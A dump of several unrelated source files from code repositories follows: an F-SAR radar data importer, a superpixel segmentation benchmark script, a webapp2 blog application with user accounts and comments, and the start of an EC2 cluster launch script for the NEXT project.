fil = RatFile(bandfiles[0])
naz = fil.shape[0]
nrg = fil.shape[1]
block = list(self.crop)
if block[1] == 0:
block[1] = naz
if block[3] == 0:
block[3] = nrg
daz = block[1] - block[0]
drg = block[3] - block[2]
barr = np.empty((len(bandfiles), daz, drg), dtype='float32')
for k, f in enumerate(bandfiles):
logging.info("Found " + f)
barr[k, ...] = RatFile(f).read(block=block)
array.append(barr)
if len(array) == 0:
return None, None
elif len(array) == 1:
return array[0], meta[0]
else:
return array, meta
@pyrat.docstringfrom(FSAR_phadem)
def fsar_phadem(*args, **kwargs):
return FSAR_phadem(*args, **kwargs).run(*args, **kwargs)
class FSAR_kz(pyrat.ImportWorker):
"""
Import of DLR F-SAR KZ interferometric product
:param dir: The F-SAR product directory.
:type dir: str
:param match: A matching string to select subset of files
:type match: string
:param suffix: An optional suffix appended to the INF directory (i.e. INF_<suffix>)
:type suffix: string
:param crop: A crop region / subset to import (az_start, az_end, rg_start, rg_end)
:type crop: tuple
:author: Andreas Reigber
"""
para = [
{'var': 'dir', 'value': ''},
{'var': 'bands', 'value': '*'},
{'var': 'polarisations', 'value': '*'},
{'var': 'suffix', 'value': ''},
{'var': 'sym', 'value': False, 'type': 'bool', 'text': 'Cross-polar symmetrisation'},
{'var': 'crop', 'value': [0, 0, 0, 0]}
]
def __init__(self, *args, **kwargs):
super(FSAR_kz, self).__init__(*args, **kwargs)
self.name = "FSAR KZ IMPORT"
if len(args) == 1:
self.dir = args[0]
def reader(self, *args, **kwargs):
head = 'kz'
src = ('INF' + ('_' + self.suffix if len(self.suffix) > 0 else ''), 'INF-SR')
files = glob.glob(os.path.join(self.dir, src[0], src[1], head + '*'
+ self.bands.upper() + self.polarisations.lower() + '*.rat'))
bands = list(set([os.path.basename(slc).split('_')[3][0] for slc in files]))
pols = list(set([os.path.basename(slc).split('_')[3][1:3] for slc in files]))
array = []
meta = []
meta.append({})
for band in bands:
if hasattr(self, 'band') and band not in self.band:
logging.warning(band + '-band data not found in specified directory')
else:
bandfiles = [f for f in files if '_' + band in f]
if self.sym is True and len(bandfiles) == 4: # Remove HV channel (data was symmetrised)
for slc in bandfiles:
if os.path.basename(slc).split('_')[3][1:3] == 'vh':
bandfiles.remove(slc)
fil = RatFile(bandfiles[0])
naz = fil.shape[0]
nrg = fil.shape[1]
block = list(self.crop)
if block[1] == 0:
block[1] = naz
if block[3] == 0:
block[3] = nrg
daz = block[1] - block[0]
drg = block[3] - block[2]
barr = np.empty((len(bandfiles), daz, drg), dtype='float32')
for k, f in enumerate(bandfiles):
logging.info("Found " + f)
barr[k, ...] = RatFile(f).read(block=block)
array.append(barr)
if len(array) == 0:
return None, None
elif len(array) == 1:
return array[0], meta[0]
else:
return array, meta
@pyrat.docstringfrom(FSAR_dem)
def fsar_kz(*args, **kwargs):
return FSAR_kz(*args, **kwargs).run(*args, **kwargs)
class FSAR_track(pyrat.ImportWorker):
"""
Import of DLR E-SAR REF/REALTRACK products
:param dir: The F-SAR product directory.
:type dir: str
:param match: A matching string to select subset of files
:type match: string
:param crop: A crop region / subset to import (az_start, az_end, rg_start, rg_end)
:type crop: tuple
:author: Andreas Reigber
"""
para = [
{'var': 'dir', 'value': ''},
{'var': 'bands', 'value': '*'},
{'var': 'polarisations', 'value': '*'},
{'var': 'product', 'value': 'RGI-SLC'},
{'var': 'crop', 'value': [0, 0, 0, 0]}]
def __init__(self, *args, **kwargs):
super(FSAR_track, self).__init__(*args, **kwargs)
self.name = "FSAR REAL/REF TRACK IMPORT"
self.block = 'T'
if len(args) == 1:
self.dir = args[0]
def reader(self, *args, **kwargs):
sys = pyrat.data.getAnnotation()
pre_az = sys['pre_az'] # pressuming in azimuth factor
if self.product == 'RGI-SLC':
# head = 'reftr_sar_resa'
head = '_sar_resa'
src = ('RGI', 'RGI-TRACK')
if self.product == 'RGI-AMP':
# head = 'reftr_sar_resa'
head = '_sar_resa'
src = ('RGI', 'RGI-TRACK')
if self.product == 'INF-SLC':
# head = 'reftr_sar_resa'
head = '_sar_resa'
src = ('INF', 'INF-TRACK')
if self.product == 'INF-CIR':
# head = 'reftr_sar_resa'
head = 'track_loc'
src = ('GTC', 'GTC-AUX')
files = glob.glob(os.path.join(self.dir, src[0], src[1],
'*' + head + '*' + self.bands.upper() + self.polarisations.lower() + '*.rat'))
if self.product == 'INF-CIR':
bands = list(set([os.path.basename(slc).split('_')[3][0] for slc in files]))
pols = list(set([os.path.basename(slc).split('_')[3][1:3] for slc in files]))
tracks = list(set([os.path.basename(slc).split('_')[0][0:6] for slc in
files])) # contains the path to the 2 track files (reference and real)
else:
bands = list(set([os.path.basename(slc).split('_')[4][0] for slc in files]))
pols = list(set([os.path.basename(slc).split('_')[4][1:3] for slc in files]))
tracks = list(set([os.path.basename(slc).split('_')[0][0:6] for slc in
files])) # contains the path to the 2 track files (reference and real)
array = []
for band in bands:
if hasattr(self, 'band') and band not in self.band:
logging.warning(band + '-band data not found in specified directory')
else:
bandfiles = [f for f in files if '_' + band in f] # list of files from the same band
fil = RatFile(bandfiles[0])
naz = fil.shape[-2]
block = list(self.crop)
block[2] = 0
block[3] = 7
if block[1] == 0:
block[1] = naz
daz = block[1] - block[0]
drg = block[3] - block[2]
barr = np.empty((len(bandfiles) / 2, sys['pre_az'] * daz, 7))
for k, pol in enumerate(pols):
polfiles = [f for f in bandfiles if pol + '_' in f]
for i, f in enumerate(polfiles):
logging.info("Found " + f)
if 'reftr' in f:
barr[k, :, 0:3] = RatFile(f).read(block=(pre_az * block[0], 1, pre_az * daz, 3)).T
barr[k, :, 6] = RatFile(f).read(block=(pre_az * block[0], 0, pre_az * daz, 1))
elif 'track' in f:
barr[k, :, 3:6] = RatFile(f).read(block=(pre_az * block[0], 1, pre_az * daz, 3)).T
if self.product == 'INF-SLC': # read multisquit if existing
dir = f.split('INF/INF-TRACK/track_sar_resa')[0] + 'INF/INF-AUX/'
master = f.split('_')[-3]
band = f.split('_')[-2][0]
ms_files = glob.glob(dir + 'baseline_error_*' + master + '*' + band + '*.rat')
for msf in ms_files:
if 'constLin' in msf:
logging.info('Mutisquint const/linear update found!')
ms_corr = RatFile(msf).read()
x = barr[k, :, 3] - barr[k, 0, 3]
barr[k, :, 4] -= (ms_corr[0] + x * ms_corr[1])
barr[k, :, 5] -= (ms_corr[2] + x * ms_corr[3])
else:
logging.info('Mutisquint baseline correction found!')
ms_corr = RatFile(msf).read()[..., block[0]:block[0] + daz]
dy = np.sum(ms_corr[1, ...], axis=0)
dz = np.sum(ms_corr[2, ...], axis=0)
barr[k, :, 4] += np.resize(dy, pre_az * daz)
barr[k, :, 5] += np.resize(dz, pre_az * daz)
array.append(barr[:, 0:pre_az * daz:pre_az, :])
if len(array) == 0:
return None, None
elif len(array) == 1:
return array[0], None
else:
return array, None
@pyrat.docstringfrom(FSAR_track)
def fsar_track(*args, **kwargs):
return FSAR_track(*args, **kwargs).run(*args, **kwargs)
| mpl-2.0 | 8,396,901,994,008,392,000 | 39.570432 | 128 | 0.493176 | false |
blowekamp/itkSuperPixel | doc/scripts/evaluation_ski.py | 1 | 1526 | #!/usr/bin/env python
import SimpleITK as sitk
import skimage as ski
import skimage.segmentation
import numpy as np
import timeit
def mask_label_contour(image, seg):
"""Combine an image and segmentation by masking the segmentation contour.
For an input image (scalar or vector), and a multi-label
segmentation image, creates an output image where the countour of
each label masks the input image to black."""
return sitk.Mask(image, sitk.LabelContour(seg+1)==0)
# this script generates images to compare ski-image SLIC
# implementaiton vs ours.
# We have slightly different parameterizations. The image is 512x512,
# if we target 256 superpixels of size 32x32 we have simular
# parameters for each implementation.
img=sitk.ReadImage("/home/blowekamp/src/scikit-image/skimage/data/astronaut.png")
aimg_lab=ski.color.rgb2lab(sitk.GetArrayFromImage(img))
ski_slic_aimg=skimage.segmentation.slic(aimg_lab,n_segments=256,convert2lab=False)
sitk.WriteImage(mask_label_contour(img, sitk.GetImageFromArray(ski_slic_aimg))
, "astronaut_ski_slic.png")
print(min(timeit.repeat(lambda: skimage.segmentation.slic(aimg_lab,n_segments=256,convert2lab=False), number=1, repeat=5)))
img_lab = sitk.GetImageFromArray(aimg_lab, isVector=True)
sitk_slic_img=sitk.SLIC(img_lab, [32,32], maximumNumberOfIterations=10)
sitk.WriteImage(mask_label_contour(img, sitk_slic_img), "astronaut_sitk_slic.png")
print(min(timeit.repeat(lambda: sitk.SLIC(img_lab, [32,32], maximumNumberOfIterations=10), number=1, repeat=5)))
| apache-2.0 | 9,084,854,102,051,266,000 | 32.173913 | 123 | 0.773919 | false |
escolmebartlebooth/fsnd_blogs | main.py | 1 | 21055 | # imports start
import os
import jinja2
import webapp2
import re
import bb_blogdb as bdb
import logging
# end imports
# create jinja2 environment
TEMPLATE_DIR = os.path.join(os.path.dirname(__file__), 'templates')
JINJA_ENV = jinja2.Environment(loader=jinja2.FileSystemLoader(TEMPLATE_DIR),
autoescape=True)
class Handler(webapp2.RequestHandler):
""" a baseic handler to render pages and handle events """
def write(self, *a, **kw):
self.response.out.write(*a, **kw)
def render_str(self, template, **params):
t = JINJA_ENV.get_template(template)
return t.render(params)
def render(self, template, **kw):
self.write(self.render_str(template, user=self.user, **kw))
def login(self, username, password):
"""
try to login
if successful write a secure cookie to the browser
"""
user = None
e = {}
# if the username isn't blank, continue, else fail
if username:
# as the User Entity if the username and password are valid
user = bdb.BlogUser.login(username, password)
# if the user is good, then set a cookie on the site
if user:
self.set_secure_cookie('user_id', str(user.key.id()))
else:
e = {'error': 'invalid login'}
return (user, e)
def signup(self, username, password, verify, email):
"""
test that values are valid
then register the user and then login
"""
# create checkers
user_re = re.compile(r"^[a-zA-Z0-9_-]{3,20}$")
password_re = re.compile(r"^.{3,20}$")
email_re = re.compile(r"^[\S]+@[\S]+.[\S]+$")
user = None
e = {}
# is the username a valid style?
if not (username and user_re.match(username)):
e['username'] = 'invalid username'
# is the password a valid style and does it match the verify?
if not (password and user_re.match(password)):
e['password'] = 'invalid password'
elif (password != verify):
e['verify'] = 'passwords must match'
# if provided, is the email a valid style?
if (email and not email_re.match(email)):
e['email'] = 'invalid email'
# if all looks well, register the user
if not e:
user = bdb.BlogUser.signup(username, password, email)
if user:
# if registered successfully, log the user in
self.set_secure_cookie('user_id', str(user.id()))
else:
e['username'] = 'username exists'
return (user, e)
def blog_exists(self, blog_id=None):
"""
helper to determine if a blog id is valid
return the blog entity if it exists
otherwise return None
"""
try:
blog = bdb.BlogPost.by_id(int(blog_id))
return blog
except (TypeError, ValueError):
return None
def user_owns_blog(self, user=None, blog=None):
""" helper to determine if a user owns the blog """
if (user.key == blog.userkey):
return True
else:
return False
def user_owns_comment(self, user=None, blog=None, comment_id=None):
"""
helper function to check that the user owns the comment
try to cast the id as an integer
then check if the comment is owned by the user
return true if the user does own the user
"""
try:
# is the comment id an integer
comment_id = int(comment_id)
if (user.key == blog.comments[comment_id].userkey):
# the user does own the comment
return True
else:
return False
except:
# bad comment id
return False
def delete_blog(self, user=None, blog=None):
""" check that the user owns the blog and if so delete it """
if self.user_owns_blog(user, blog):
return bdb.BlogPost.delete_blog(blog)
else:
return None
def set_secure_cookie(self, name, val):
"""
create a secure cookie from the passed value
and store against the name
"""
cookie_val = bdb.make_secure_val(val)
self.response.headers.add_header('Set-Cookie',
"{}={}; Path=/".format(name,
cookie_val))
def read_secure_cookie(self, name):
""" read the cookie from the browser """
cookie_val = self.request.cookies.get(name)
return cookie_val and bdb.check_secure_val(cookie_val)
def initialize(self, *a, **kw):
""" used to access the user cookie and store against the handler """
webapp2.RequestHandler.initialize(self, *a, **kw)
user_id = self.read_secure_cookie('user_id')
self.user = user_id and bdb.BlogUser.by_id(int(user_id))
class blog(Handler):
""" handler for the main app page to display and edit blogs """
def render_blog(self, **kw):
self.render("blog.html", **kw)
def get(self):
""" get the ten most recent blog entries and render the page """
blogs = bdb.BlogPost.get_blogs(10)
self.render_blog(pagetitle="welcome to bartlebooth blogs",
blogs=blogs, e=None, viewpost=False)
def post(self):
""" process the delete form that is on the blog main page """
# get the blog id from the form entries
blog_id = self.request.get('blog_id')
if self.user:
# the user is logged in, does the blog exist?
blog = self.blog_exists(blog_id)
# form value is DELETE and the blog exists
if blog and self.request.get('blogdelete'):
# pass deletion to a common handler
self.delete_blog(self.user, blog)
# re-render the blogs page
self.redirect('/blog')
else:
# user isn't logged in so show the login page
self.redirect('/blog/login')
class blogedit(Handler):
""" Handle updates to blog posts """
def render_editpost(self, **kw):
self.render("editpost.html", **kw)
def get(self, blog_id):
"""
get the blog from the query parameter
check user owns the blog
"""
if self.user:
# user valid
blog = self.blog_exists(blog_id)
if blog and self.user_owns_blog(self.user, blog):
# blog is valid and owned by the user so render the edit form
self.render_editpost(pagetitle="edit post", blog=blog, e=None)
else:
# TO DO SHOW ERROR ON REFERRER FORM?
self.redirect(self.request.referer)
else:
# not logged in so show the login page
self.redirect('/blog/login')
def post(self, post_id):
"""
Check the user, blog and subject/comment entries
then post or fail the edit
"""
# get the form values from the edit post
blog_id = self.request.get("blog_id")
subject = self.request.get("subject")
posting = self.request.get("posting")
if self.user:
# user valid
blog = self.blog_exists(blog_id)
# test blog exists and the user owns the form
if blog and self.user_owns_blog(self.user, blog):
if (subject and posting):
# save the edit and redirect to blog post
bdb.BlogPost.edit_blog(blog=blog, subject=subject,
posting=posting)
self.redirect('/blog/{}'.format(str(blog_id)))
else:
# subject and posting shouldn't be empty so error
e = {'posterror': 'subject and posting must not be empty'}
self.render_editpost(pagetitle="edit post",
blog=blog, e=e)
else:
# TO DO - SHOULD THIS BE AN ERROR?
self.redirect('/blog')
else:
self.redirect('/blog/login')
class logout(Handler):
"""
Handle a GET to the /blog/logout page
"""
def get(self):
""" clear the user_id cookie if the User is set """
if self.user:
self.response.headers.add_header('Set-Cookie', "user_id=; Path=/")
self.redirect("/blog")
class signup(Handler):
"""
Handler to process a sign up request
either log the user in or error
"""
def render_signup(self, **kw):
self.render("signup.html", **kw)
def get(self):
""" pass to handler function """
self.render_signup(pagetitle="signup to bartlebooth blogs",
items=None, e=None)
def post(self):
"""
capture form input
then pass to base handler to verify signup
"""
username = self.request.get('username')
password = self.request.get('password')
verify = self.request.get('verify')
email = self.request.get('email')
# check if user signup is ok
user, e = self.signup(username, password, verify, email)
# if ok, show the welcome page to the new user and log the user in
if user:
self.redirect("/blog/welcome")
else:
# else show an error set on the signup page
items = {'username': username, 'email': email}
self.render_signup(pagetitle="signup to bartlebooth blogs",
items=items, e=e)
class login(Handler):
"""
Handler which renders a login page
then processes the input to log a user in
"""
def render_login(self, **kw):
self.render("login.html", **kw)
def get(self):
self.render_login(pagetitle="login to bartlebooth blogs",
items=None, e=None)
def post(self):
"""
Process the Login form input
either log the user in or report errors
"""
# capture form values
username = self.request.get('username')
password = self.request.get('password')
# check if user valid
user, e = self.login(username, password)
# if valid, show the welcome page and login the user
if user:
self.redirect("/blog/welcome")
else:
# if not valid return error
items = {'username': username}
self.render_login(pagetitle="login to bartlebooth blogs",
items=items, e=e)
class welcome(Handler):
""" Handler to display a welcome page if a user is logged in """
def render_welcome(self, **kw):
self.render("welcome.html", **kw)
def get(self):
"""
check if valid user and render page
otherwise direct to login
"""
if self.user:
# pass to handler function
page_title = "welcome to bb blogs {}".format(self.user.username)
self.render_welcome(pagetitle=page_title)
else:
# pass to login page if not a valid user
self.redirect("/blog/login")
class newpost(Handler):
"""
Handles authentication and rendering of new post page
Handles the processing of the new post itself
"""
def render_newpost(self, **kw):
self.render("newpost.html", **kw)
def get(self):
"""
check if valid user and render page
otherwise direct to login
"""
if self.user:
# the user is valid so render the new post page
self.render_newpost(pagetitle="new post", items=None, e=None)
else:
# the user isn't valid so pass to login page
self.redirect("/blog/login")
def post(self):
"""
Captures the new post parameters
Checks for validity and creates the new post
"""
# get input and logged on user
subject = self.request.get('subject')
posting = self.request.get('posting')
if not self.user:
# if the user isn't valid, go to the login page
self.redirect("/blog/login")
elif not subject or not posting:
# if either subject or post is empty, raise an error
e = {'error': "Subject and Post cannot be blank"}
items = {'subject': subject, 'posting': posting}
self.render_newpost(pagetitle="new post", items=items, e=e)
else:
post = bdb.BlogPost.new_post(self.user,
subject, posting)
self.redirect("/blog/{}".format(str(post.id())))
class viewpost(Handler):
""" handler to display an individual blog entry """
def render_viewpost(self, **kw):
self.render("viewpost.html", **kw)
def get(self, blog_id):
"""
get the blog_id on the query string and test it's validity
if ok, show the blog, if not sliently redirect to the /blog page
"""
blog = self.blog_exists(blog_id)
if blog:
# blog exists so show the view page
self.render_viewpost(pagetitle="post: {}".format(blog.subject),
blog=blog, e=None, viewpost=True)
else:
self.redirect("/blog")
def post(self, post_id):
""" handler for the multiple forms on the view page """
# get the blog id
blog_id = self.request.get('blog_id')
blog = self.blog_exists(blog_id)
# user is valid
if self.user and blog:
# test if deletion request
if self.request.get('blogdelete'):
# pass deletion to a common handler
self.delete_blog(self.user, blog)
# re-direct to blog
self.redirect("/blog")
else:
# not logged in so show login page
self.redirect('/blog/login')
class bloglike(Handler):
""" handler to manage the actions of liking a blog """
def post(self):
"""
check if the user is logged in
check if the user owns the blog
check if this user has liked/disliked this blog
update the like / dislike
"""
blog_id = self.request.get('blog_id')
blog = self.blog_exists(blog_id)
# check whether its a like or dislike request
if self.request.get('like'):
like_action = True
elif self.request.get('dislike'):
like_action = False
# see if the user is logged in
if self.user and blog:
# does the user owns the blog
if not (bdb.BlogLike.like_exists(self.user, blog) or
self.user_owns_blog(self.user, blog)):
# post the like with the like action
bdb.BlogPost.like_blog(self.user, blog, like_action)
# go to post
self.redirect('/blog/{}'.format(int(blog_id)))
else:
# bad user id or blog, show login
self.redirect('/blog/login')
class blogcomment(Handler):
""" handler to manage commenting on a blog """
def get(self, blog_id):
""" test whether logged in and not owner """
blog = self.blog_exists(blog_id)
if self.user and blog:
if not self.user_owns_blog(self.user, blog):
# postcomment True means a textarea will show on the viewpost
e = {'postcomment': True}
else:
e = {'error': 'you own the blog so cannot comment'}
# show page
self.render("viewpost.html",
pagetitle="post: {}".format(blog.subject),
blog=blog, e=e, viewpost=True)
else:
# bad user id or blog
self.redirect('/blog/login')
def post(self, blog_id):
""" save the comment if logged in and the comment is ok """
blog = self.blog_exists(blog_id)
if self.user and blog:
# user is logged in
if not self.user_owns_blog(self.user, blog):
comment = self.request.get('comment')
if comment:
# comment isn't empty
bdb.BlogPost.add_comment(self.user, blog, comment)
e = None
else:
e = {'error': 'comment cannot be blank'}
else:
e = {'error': 'you own the blog'}
# render the page
self.render("viewpost.html",
pagetitle="post: {}".format(blog.subject),
blog=blog, e=e, viewpost=True)
else:
# user not logged in or bad blog
self.redirect('/blog/login')
class blogdeletecomment(Handler):
""" handler to manage deleting a comment on a blog """
def post(self):
""" test whether logged in and not owner """
# get form values if a delete comment request
if (self.request.get('deletecomment')):
blog_id = self.request.get('blog_id')
comment_id = self.request.get('comment_id')
blog = self.blog_exists(blog_id)
if self.user and blog:
if self.user_owns_comment(self.user, blog,
comment_id):
# delete comment
bdb.BlogPost.delete_comment(blog, comment_id)
# re-render the blog
self.redirect('/blog/{}'.format(int(blog_id)))
else:
# user not logged in
self.redirect('/blog/login')
else:
# user not logged in
self.redirect('/blog/login')
class blogeditcomment(Handler):
""" handler to manage edit comments on a blog """
def get(self, blog_id):
""" test whether logged in and not owner """
blog = self.blog_exists(blog_id)
comment_id = self.request.get('cid')
try:
comment_index = int(comment_id)
if self.user and blog:
# user logged in
if self.user_owns_comment(self.user,
blog, comment_index):
e = {'editcomment': comment_id}
else:
e = {'error': 'you do not own this comment'}
# show post
self.render("viewpost.html",
pagetitle="post: {}".format(blog.subject),
blog=blog, e=e, viewpost=True)
else:
# bad login
self.redirect('/blog/login')
except:
# bad comment id so show login
self.redirect('/blog/login')
def post(self, blog_id):
""" save the comment if logged in and the comment is ok """
blog = self.blog_exists(blog_id)
comment = self.request.get('updatecomment')
comment_id = self.request.get('comment_id')
if self.user and blog:
# user logged in
if self.user_owns_comment(self.user, blog, comment_id):
try:
comment_index = int(comment_id)
if comment:
# comment isn't empty
bdb.BlogPost.save_comment(self.user, blog,
comment_index, comment)
e = None
else:
e = {'error': 'comment cannot be blank'}
e['editcomment'] = comment_id
except ValueError:
# comment id is not an integer / valid
e = {'error': 'bad comment id'}
else:
# comment is not owned by user
e = {'error': 'you do not own this comment'}
# render the view post page
self.render("viewpost.html",
pagetitle="post: {}".format(blog.subject),
blog=blog, e=e, viewpost=True)
else:
# user not logged in or bad blog
self.redirect('/blog/login')
# register page handlers
app = webapp2.WSGIApplication([
('/blog', blog),
('/blog/logout', logout),
('/blog/login', login),
('/blog/signup', signup),
('/blog/welcome', welcome),
('/blog/new', newpost),
('/blog/([0-9]+)', viewpost),
('/blog/edit/([0-9]+)', blogedit),
('/blog/comment/([0-9]+)', blogcomment),
('/blog/editcomment/([0-9]+)', blogeditcomment),
('/blog/deletecomment', blogdeletecomment),
('/blog/like', bloglike)
],
debug=False)
| mit | 4,515,155,355,139,144,700 | 32.634185 | 78 | 0.528616 | false |
lalitkumarj/NEXT-psych | ec2/next_ec2.py | 1 | 52111 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file was forked from the Apache Spark project and modified. Many
# thanks to those guys for a great time-saving file.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import with_statement
import hashlib
import logging
import os
import pipes
import random
import shutil
import string
import subprocess
import sys
import tarfile
import tempfile
import textwrap
import time
import urllib2
import warnings
from datetime import datetime
from optparse import OptionParser
from sys import stderr
"""
# launch a new cluster of instance type "c3.8xlarge" (see http://www.ec2instances.info or below for other choices)
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem --instance-type=c3.8xlarge launch kevin_dev
# get the public-DNS of your machine
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem get-master kevin_dev
# rsync the next-discovery code up to your machine
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem rsync kevin_dev
# login to your machine manually or use
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem login kevin_dev
# restore from database file already on S3
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem --backup-filename=mongo_dump_next-test1.discovery.wisc.edu_2015-04-22_01:09:42.tar.gz restore kevin_dev
# display all files in a bucket with a given prefix. Useful if you need to find a database backup to restore from. Will display all files if prefix is not given
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem --bucket=next.discovery --prefix=mongo_dump_next-test1.discovery.wisc.edu listbucket kevin_dev
# create a new S3 bucket and obtain the unique bucket name
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem createbucket kevin_dev
# force the current machine to perform a backup NOW to a designated filename
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem --backup-filename=this_is_a_custom_filename backup kevin_dev
# stop the current machine
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem stop kevin_dev
# start the current machine
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem start kevin_dev
# terminate the current machine
python next_ec2.py --key-pair=next_key_1 --identity-file=/Users/kevinjamieson/aws_keys/next_key_1.pem destroy kevin_dev
"""
NEXT_BACKEND_GLOBAL_PORT = 8000
NEXT_FRONTEND_GLOBAL_PORT = 80
EC2_SRC_PATH = '/usr/local'
EC2_NEXT_PATH = EC2_SRC_PATH + '/next-discovery'
LOCAL_NEXT_PATH = './../'
DEFAULT_REGION = 'us-west-2'
DEFAULT_AMI = 'ami-6989a659' # Ubuntu Server 14.04 LTS
DEFAULT_USER = 'ubuntu'
DEFAULT_INSTANCE_TYPE = 'm3.large'
import boto
from boto.ec2.blockdevicemapping import BlockDeviceMapping, BlockDeviceType, EBSBlockDeviceType
from boto import ec2
class UsageError(Exception):
pass
instance_info = {
"c1.medium" : { "cpu": 2, "memory": 1.7, "cost_per_hr": 0.13 },
"c1.xlarge" : { "cpu": 8, "memory": 7, "cost_per_hr": 0.52 },
"c3.large" : { "cpu": 2, "memory": 3.75, "cost_per_hr": 0.105 },
"c3.xlarge" : { "cpu": 4, "memory": 7.5, "cost_per_hr": 0.21 },
"c3.2xlarge" : { "cpu": 8, "memory": 15, "cost_per_hr": 0.42 },
"c3.4xlarge" : { "cpu": 16, "memory": 30, "cost_per_hr": 0.84 },
"c3.8xlarge" : { "cpu": 32, "memory": 60, "cost_per_hr": 1.68 },
"c4.large" : { "cpu": 2, "memory": 3.75, "cost_per_hr": 0.116 },
"c4.xlarge" : { "cpu": 4, "memory": 7.5, "cost_per_hr": 0.232 },
"c4.2xlarge" : { "cpu": 8, "memory": 15, "cost_per_hr": 0.464 },
"c4.4xlarge" : { "cpu": 16, "memory": 30, "cost_per_hr": 0.928 },
"c4.8xlarge" : { "cpu": 36, "memory": 60, "cost_per_hr": 1.856 },
"cc2.8xlarge" : { "cpu": 32, "memory": 60.5, "cost_per_hr": 2 },
"cr1.8xlarge" : { "cpu": 32, "memory": 244, "cost_per_hr": 3.5 },
"d2.xlarge" : { "cpu": 4, "memory": 30.5, "cost_per_hr": 0.69 },
"d2.2xlarge" : { "cpu": 8, "memory": 61, "cost_per_hr": 1.38 },
"d2.4xlarge" : { "cpu": 16, "memory": 122, "cost_per_hr": 2.76 },
"d2.8xlarge" : { "cpu": 36, "memory": 244, "cost_per_hr": 5.52 },
"g2.2xlarge" : { "cpu": 8, "memory": 15, "cost_per_hr": 0.65 },
"g2.8xlarge" : { "cpu": 32, "memory": 60, "cost_per_hr": 2.6 },
"hi1.4xlarge" : { "cpu": 16, "memory": 60.5, "cost_per_hr": 3.1 },
"hs1.8xlarge" : { "cpu": 16, "memory": 117, "cost_per_hr": 4.6 },
"i2.xlarge" : { "cpu": 4, "memory": 30.5, "cost_per_hr": 0.853 },
"i2.2xlarge" : { "cpu": 8, "memory": 61, "cost_per_hr": 1.705 },
"i2.4xlarge" : { "cpu": 16, "memory": 122, "cost_per_hr": 3.41 },
"i2.8xlarge" : { "cpu": 32, "memory": 244, "cost_per_hr": 6.82 },
"m1.small" : { "cpu": 1, "memory": 1.7, "cost_per_hr": 0.044 },
"m1.medium" : { "cpu": 1, "memory": 3.75, "cost_per_hr": 0.087 },
"m1.large" : { "cpu": 2, "memory": 7.5, "cost_per_hr": 0.175 },
"m1.xlarge" : { "cpu": 4, "memory": 15, "cost_per_hr": 0.35 },
"m2.xlarge" : { "cpu": 2, "memory": 17.1, "cost_per_hr": 0.245 },
"m2.2xlarge" : { "cpu": 4, "memory": 34.2, "cost_per_hr": 0.49 },
"m2.4xlarge" : { "cpu": 8, "memory": 68.4, "cost_per_hr": 0.98 },
"m3.medium" : { "cpu": 1, "memory": 3.75, "cost_per_hr": 0.07 },
"m3.large" : { "cpu": 2, "memory": 7.5, "cost_per_hr": 0.14 },
"m3.xlarge" : { "cpu": 4, "memory": 15, "cost_per_hr": 0.28 },
"m3.2xlarge" : { "cpu": 8, "memory": 30, "cost_per_hr": 0.56 },
"r3.large" : { "cpu": 2, "memory": 15, "cost_per_hr": 0.175 },
"r3.xlarge" : { "cpu": 4, "memory": 30.5, "cost_per_hr": 0.35 },
"r3.2xlarge" : { "cpu": 8, "memory": 61, "cost_per_hr": 0.7 },
"r3.4xlarge" : { "cpu": 16, "memory": 122, "cost_per_hr": 1.4 },
"r3.8xlarge" : { "cpu": 32, "memory": 244, "cost_per_hr": 2.8 },
"t1.micro" : { "cpu": 1, "memory": 0.615, "cost_per_hr": 0.02 },
"t2.micro" : { "cpu": 1, "memory": 1, "cost_per_hr": 0.013 },
"t2.small" : { "cpu": 1, "memory": 2, "cost_per_hr": 0.026 },
"t2.medium" : { "cpu": 2, "memory": 4, "cost_per_hr": 0.052 },
}
# Configure and parse our command-line arguments
def parse_args():
parser = OptionParser(
prog="spark-ec2",
version="%prog {v}".format(v=''),
usage="%prog [options] <action> <cluster_name>\n\n"
+ "<action> can be: launch, destroy, login, stop, start, get-master, reboot-slaves, rsync, backup, restore, docker_up, docker_login, listbucket, createbucket")
parser.add_option(
"-s", "--slaves", type="int", default=0,
help="Number of slaves to launch (default: %default)")
parser.add_option(
"-k", "--key-pair",
help="Key pair to use on instances")
parser.add_option(
"-i", "--identity-file",
help="SSH private key file to use for logging into instances")
parser.add_option(
"-t", "--instance-type", default=DEFAULT_INSTANCE_TYPE,
help="Type of instance to launch (default: %default). " +
"WARNING: must be 64-bit; small instances won't work")
parser.add_option(
"-m", "--master-instance-type", default="",
help="Master instance type (leave empty for same as instance-type)")
parser.add_option(
"-r", "--region", default=DEFAULT_REGION,
help="EC2 region zone to launch instances in")
parser.add_option(
"-z", "--zone", default="",
help="Availability zone to launch instances in, or 'all' to spread " +
"slaves across multiple (an additional $0.01/Gb for bandwidth" +
"between zones applies) (default: a single zone chosen at random)")
parser.add_option("-a", "--ami", default=DEFAULT_AMI,
help="Amazon Machine Image ID to use (default: %default). ")
parser.add_option(
